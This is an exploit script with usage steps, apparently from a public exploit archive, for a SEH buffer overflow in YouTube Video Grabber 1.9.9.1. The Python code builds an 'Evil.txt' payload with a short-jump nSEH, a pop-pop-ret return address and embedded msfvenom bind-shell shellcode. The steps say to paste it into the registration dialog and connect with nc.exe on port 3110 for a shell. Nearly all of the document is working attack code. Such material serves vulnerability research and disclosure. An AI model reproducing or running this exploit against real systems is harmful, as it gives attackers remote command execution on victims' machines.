# Exploit Title: YouTube Video Grabber 1.9.9.1 - Buffer Overflow (SEH)
# Date: 01.11.2021
# Software Link:   https://www.litexmedia.com/ytgrabber.exe
# Exploit Author: Achilles
# Tested Version: 1.9.9.1
# Tested on: Windows 7 64bit

# 1.- Run python code : YouTube.py
# 2.- Open EVIL.txt and copy All content to Clipboard
# 3.- Open YouTube Video Grabber and press Enter Code
# 4.- Paste the Content of EVIL.txt into the 'Name and Serial Nummer'
# 5.- Click 'OK'
# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
# 7.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python

import struct

buffer = "\x41" * 712
nseh = "\xEB\x06\x90\x90" #jmp short 6
seh  =  struct.pack('<L',0x01c5642e) #pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_WRITECOPY} [YouTubeGrabber.exe
nops =  "\x90" * 20
#msfvenom -p windows/shell_bind_tcp LPORT=3110 -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d\x20"
buf =  b""
buf += b"\x89\xe1\xd9\xc6\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x49\x78\x6e"
buf += b"\x62\x63\x30\x37\x70\x63\x30\x71\x70\x6d\x59\x4d\x35"
buf += b"\x56\x51\x6f\x30\x61\x74\x6c\x4b\x72\x70\x46\x50\x6e"
buf += b"\x6b\x43\x62\x56\x6c\x6c\x4b\x30\x52\x35\x44\x4c\x4b"
buf += b"\x31\x62\x54\x68\x74\x4f\x6e\x57\x42\x6a\x31\x36\x75"
buf += b"\x61\x49\x6f\x4e\x4c\x65\x6c\x50\x61\x33\x4c\x43\x32"
buf += b"\x36\x4c\x67\x50\x69\x51\x5a\x6f\x66\x6d\x47\x71\x5a"
buf += b"\x67\x4b\x52\x79\x62\x36\x32\x56\x37\x6e\x6b\x62\x72"
buf += b"\x44\x50\x4c\x4b\x51\x5a\x67\x4c\x6c\x4b\x52\x6c\x34"
buf += b"\x51\x32\x58\x5a\x43\x70\x48\x66\x61\x48\x51\x63\x61"
buf += b"\x6e\x6b\x31\x49\x31\x30\x65\x51\x38\x53\x4e\x6b\x50"
buf += b"\x49\x45\x48\x6a\x43\x77\x4a\x57\x39\x6c\x4b\x57\x44"
buf += b"\x6c\x4b\x76\x61\x4a\x76\x76\x51\x39\x6f\x6e\x4c\x4a"
buf += b"\x61\x5a\x6f\x34\x4d\x66\x61\x58\x47\x47\x48\x6d\x30"
buf += b"\x63\x45\x4a\x56\x54\x43\x71\x6d\x39\x68\x37\x4b\x71"
buf += b"\x6d\x57\x54\x62\x55\x68\x64\x56\x38\x6c\x4b\x30\x58"
buf += b"\x31\x34\x73\x31\x48\x53\x53\x56\x6e\x6b\x76\x6c\x52"
buf += b"\x6b\x6c\x4b\x32\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b"
buf += b"\x77\x74\x4c\x4b\x65\x51\x38\x50\x6e\x69\x77\x34\x56"
buf += b"\x44\x65\x74\x31\x4b\x33\x6b\x50\x61\x42\x79\x73\x6a"
buf += b"\x30\x51\x6b\x4f\x4d\x30\x63\x6f\x61\x4f\x33\x6a\x6e"
buf += b"\x6b\x56\x72\x78\x6b\x4e\x6d\x61\x4d\x31\x78\x47\x43"
buf += b"\x46\x52\x37\x70\x75\x50\x52\x48\x62\x57\x70\x73\x45"
buf += b"\x62\x43\x6f\x42\x74\x63\x58\x50\x4c\x62\x57\x55\x76"
buf += b"\x36\x67\x59\x6f\x4a\x75\x6e\x58\x4c\x50\x37\x71\x75"
buf += b"\x50\x67\x70\x51\x39\x39\x54\x46\x34\x62\x70\x42\x48"
buf += b"\x44\x69\x4f\x70\x30\x6b\x75\x50\x59\x6f\x48\x55\x32"
buf += b"\x4a\x53\x38\x76\x39\x50\x50\x69\x72\x59\x6d\x37\x30"
buf += b"\x70\x50\x37\x30\x50\x50\x61\x78\x69\x7a\x54\x4f\x4b"
buf += b"\x6f\x59\x70\x59\x6f\x58\x55\x4e\x77\x31\x78\x34\x42"
buf += b"\x57\x70\x66\x6c\x74\x66\x4e\x69\x59\x76\x73\x5a\x44"
buf += b"\x50\x71\x46\x71\x47\x33\x58\x6a\x62\x79\x4b\x30\x37"
buf += b"\x50\x67\x59\x6f\x79\x45\x56\x37\x70\x68\x4d\x67\x39"
buf += b"\x79\x67\x48\x6b\x4f\x79\x6f\x4b\x65\x36\x37\x71\x78"
buf += b"\x44\x34\x68\x6c\x55\x6b\x38\x61\x69\x6f\x5a\x75\x70"
buf += b"\x57\x6d\x47\x75\x38\x42\x55\x42\x4e\x32\x6d\x71\x71"
buf += b"\x6b\x4f\x4a\x75\x62\x48\x71\x73\x52\x4d\x61\x74\x55"
buf += b"\x50\x6d\x59\x68\x63\x73\x67\x63\x67\x61\x47\x76\x51"
buf += b"\x5a\x56\x32\x4a\x75\x42\x51\x49\x63\x66\x59\x72\x79"
buf += b"\x6d\x43\x56\x78\x47\x37\x34\x57\x54\x65\x6c\x46\x61"
buf += b"\x67\x71\x6e\x6d\x43\x74\x76\x44\x64\x50\x4b\x76\x67"
buf += b"\x70\x70\x44\x42\x74\x50\x50\x52\x76\x30\x56\x63\x66"
buf += b"\x42\x66\x52\x76\x52\x6e\x36\x36\x51\x46\x46\x33\x46"
buf += b"\x36\x42\x48\x44\x39\x6a\x6c\x35\x6f\x6e\x66\x59\x6f"
buf += b"\x78\x55\x6d\x59\x4b\x50\x32\x6e\x62\x76\x42\x66\x6b"
buf += b"\x4f\x36\x50\x75\x38\x63\x38\x6f\x77\x65\x4d\x51\x70"
buf += b"\x39\x6f\x49\x45\x6d\x6b\x59\x70\x65\x4d\x67\x5a\x54"
buf += b"\x4a\x35\x38\x4d\x76\x6c\x55\x6f\x4d\x6d\x4d\x4b\x4f"
buf += b"\x68\x55\x35\x6c\x56\x66\x53\x4c\x35\x5a\x6b\x30\x69"
buf += b"\x6b\x59\x70\x50\x75\x37\x75\x6d\x6b\x72\x67\x32\x33"
buf += b"\x33\x42\x70\x6f\x43\x5a\x37\x70\x31\x43\x79\x6f\x79"
buf += b"\x45\x41\x41"
pad ="B" * (7280 - len(buffer) - len(nseh+seh) - len(nops) -len(buf))
payload = buffer + nseh + seh + nops + buf + pad

try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"